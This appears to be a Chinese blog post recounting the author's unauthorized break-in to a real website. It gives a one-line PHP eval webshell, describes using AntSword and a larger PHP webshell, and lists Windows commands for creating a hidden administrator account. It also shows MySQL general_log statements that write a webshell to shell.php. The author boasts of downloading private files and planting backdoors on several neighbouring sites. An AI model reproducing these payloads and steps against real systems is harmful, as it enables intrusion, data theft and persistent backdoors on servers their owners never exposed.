記一次PHP提權
發現
PHP大馬:指木馬病毒;PHP大馬,就是PHP寫的提取站點權限的程序;因為帶有提權或者修改站點功能,所以稱為叫木馬。
自從師哥那里聽說過之后,一直感嘆於PHP大馬的神奇...但一直沒有機會。
直到有一天,某同學發來一個學習網站,隨便翻了翻感覺嘿嘿嘿!還行......
試着上傳一句話木馬
<?php @eval($_POST['a']);?>
呃,顯示上傳成功...那就上蟻劍,直接連吧。
結果成了,這比我之前想的簡單這么多嗎???
既然到這兒了,為什么不試一下PHP大馬呢?
來吧!
准備一枚PHP大馬,通過蟻劍上傳。
(PHP大馬代碼太多了,在網站直接上傳的話,不容易成功)
輸入密碼,進入一看,我直接好家伙!畢竟是第一次去用它嘛。
網站源碼都在里面了,還有網站后門。。。
發現了一個文件夾,點進去,發現了按日期排序的某些不可言明的學習資料。。。直接下載!
那為什么大馬能實現這些功能呢?
通過socket或curl遠程讀取服務器phpapi.info上的大馬數據,有意思的一點是把大馬數據保存在session中,而不是寫到文件中,所以要根據代碼查殺是不行的。只要服務器不清除session中的數據,大馬就會一直存在。
其他東西
去到上級目錄,旁站的數據也看到了。。。還有賭博站、發卡站等,看了看有七八個站。
那網站源碼我就存下了,學習資料也順手留下啦!
順便在旁站留下后門,別問,問就是為了好好學習!
我們可以新建管理用戶、查看PHP版本
(這個站的PHP版本應該是7.1.33的)
還可以MYSQL提權!這我真沒想到(這枚大馬是師哥送我的,我也是第一次去使用它)
有了MySQL提權,我們可以試着利用日志寫入webshell。直接提權的話也可以試試(反正我沒試過)。
PHP大馬提權過程簡寫
WINDOWS常見命令:
net user 查看所有用戶
query user 查看當前運行中的用戶
net user 用戶名 密碼 修改用戶密碼
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 /active 激活用戶
net localgroup administrators 用戶名 /add 添加管理員組
1.利用蟻劍上傳cmd.exe
2.執行后,先查看所有用戶,然后新建用戶並將其填到管理員用戶組下,用戶名密碼隨便設置一個就好。
3.在WINDOWS10自帶搜索框搜素mstsc呼出,點擊遠程桌面連接,輸入ip即可連接服務器
MYSQL提權
MYSQL提權作用很大,我是從別處學到的,學藝不精,不敢妄語。
利用log日志寫入WebShell
log日志可以保存所有的查詢日志,先執行如下代碼看一看基本配置:
show variables like '%general%';
當 general_log=ON 時,所查詢的sql語句都會出現在log文件中。那么,如果把 general_log_file 的路徑修改為 shell.php,那么所查詢的sql語句就會保存在shell.php中,如果我們執行查詢一個一句話,就可以getshell。
set global general_log_file = '/var/www/html/shell.php'; # 設置日志文件地址
select '<?php eval($_POST[abc]);?>'; # 查詢一句話,此時日志文件shell.php中將寫入webshell
set global general_log=OFF; #關閉
如果general_log=OFF的話我們還得需要設置為ON模式,再執行上面的sql語句。
set global general_log = ON;
小小看法
PHP大馬和蟻劍哪個好用?我個人認為蟻劍好一些,PHP大馬的功能,很多都可以利用蟻劍實現(而且我習慣用蟻劍了)。但其實也無所謂。
具體的PHP大馬分析在寫,有機會的話會寫一個具體的PHP大馬分析,並給出我的PHP大馬。